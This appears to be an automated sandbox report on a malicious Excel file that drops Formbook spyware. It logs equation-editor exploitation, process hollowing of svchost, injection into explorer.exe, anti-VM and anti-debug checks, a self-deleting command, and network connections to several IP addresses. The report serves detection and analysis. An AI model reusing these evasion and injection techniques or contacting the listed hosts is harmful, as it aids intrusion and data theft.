Source: 00000004.00000002.2139456624.00000000033DB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2188116011.0000000000380000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2188145697.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2187983316.00000000001B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2350004296.0000000000120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2349923840.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2349968714.00000000000B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: vbc[1].exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: explorer.exe, 00000006.00000000.2152230582.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winXLSX@9/6@7/7

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$P. I.xlsx

Jump to behavior

Source: C:\Users\Public\vbc.exe

Mutant created: \Sessions\1\BaseNamedObjects\TWeFoZCBhuuDrspdwLO

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD548.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: P. I.xlsx

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source:	Binary string: svchost.pdb source: vbc.exe, 00000005.00000002.2188179279.00000000004C9000.00000004.00000020.sdmp

Source: P. I.xlsx

Initial sample: OLE indicators vbamacros = False

Source: P. I.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: vbc[1].exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.2.dr, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.b80000.3.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.b80000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.b80000.1.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.b80000.0.unpack, SimpleTickerWindowsForms/SimpleTickerView.cs	.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D767A push ds; retf	4_2_002D767B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002D9AC2 push ebp; ret	4_2_002D9AC3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041C96A push ecx; ret	5_2_0041C981
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004151BF push ss; iretd	5_2_004151E4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B3C5 push eax; ret	5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B47C push eax; ret	5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B412 push eax; ret	5_2_0041B418
Source: C:\Users\Public\vbc.exe	Code function: 5_2_0041B41B push eax; ret	5_2_0041B482
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00409DE2 pushfd ; iretd	5_2_00409DE8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C2DFA1 push ecx; ret	5_2_00C2DFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008EDFA1 push ecx; ret	7_2_008EDFB4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_000951BF push ss; iretd	7_2_000951E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009B3C5 push eax; ret	7_2_0009B418
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009B41B push eax; ret	7_2_0009B482
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009B412 push eax; ret	7_2_0009B418
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009B47C push eax; ret	7_2_0009B482
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0009C96A push ecx; ret	7_2_0009C981
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00089DE2 pushfd ; iretd	7_2_00089DE8

Source: initial sample	Static PE information: section name: .text entropy: 7.44406855535
Source: initial sample	Static PE information: section name: .text entropy: 7.44406855535

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Users\Public\vbc.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ASP.NET_4.0.30319\Names

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: P. I.xlsx

Stream path 'EncryptedPackage' entropy: 7.99850778936 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000004.00000002.2139267535.00000000025FE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2824, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL8

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\vbc.exe

Window / User API: threadDelayed 788

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2292	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2832	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2832	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2756	Thread sleep time: -41500s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2876	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2812	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2240	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 2948	Thread sleep time: -34000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe	Last function: Thread delayed

Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMwareHD;m
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMWARE8
Source: explorer.exe, 00000006.00000002.2350111291.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2154896207.0000000004234000.00000004.00000001.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2155061516.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: :m"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMware HD;m
Source: explorer.exe, 00000006.00000000.2154896207.0000000004234000.00000004.00000001.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: :m%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMWAREHD;m
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000002.2350147423.0000000000231000.00000004.00000020.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: vbc.exe, 00000004.00000002.2139309154.000000000266E000.00000004.00000001.sdmp	Binary or memory string: vmware8

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004088C0 rdtsc

5_2_004088C0

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00409B30 LdrLoadDll,

5_2_00409B30

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00C326F8 mov eax, dword ptr fs:[00000030h]		5_2_00C326F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_008F26F8 mov eax, dword ptr fs:[00000030h]		7_2_008F26F8

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 101.100.209.140 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.130.255.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 74.220.199.6 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.101.172.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.215.9.186 80	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread register set: target process: 1388	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1388	Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\Public\vbc.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\Public\vbc.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 720000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000002.2350111291.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000002.2350339431.00000000006F0000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.2351266856.0000000002F30000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Queries volume information: C:\Users\Public\vbc.exe VolumeInformation

Jump to behavior

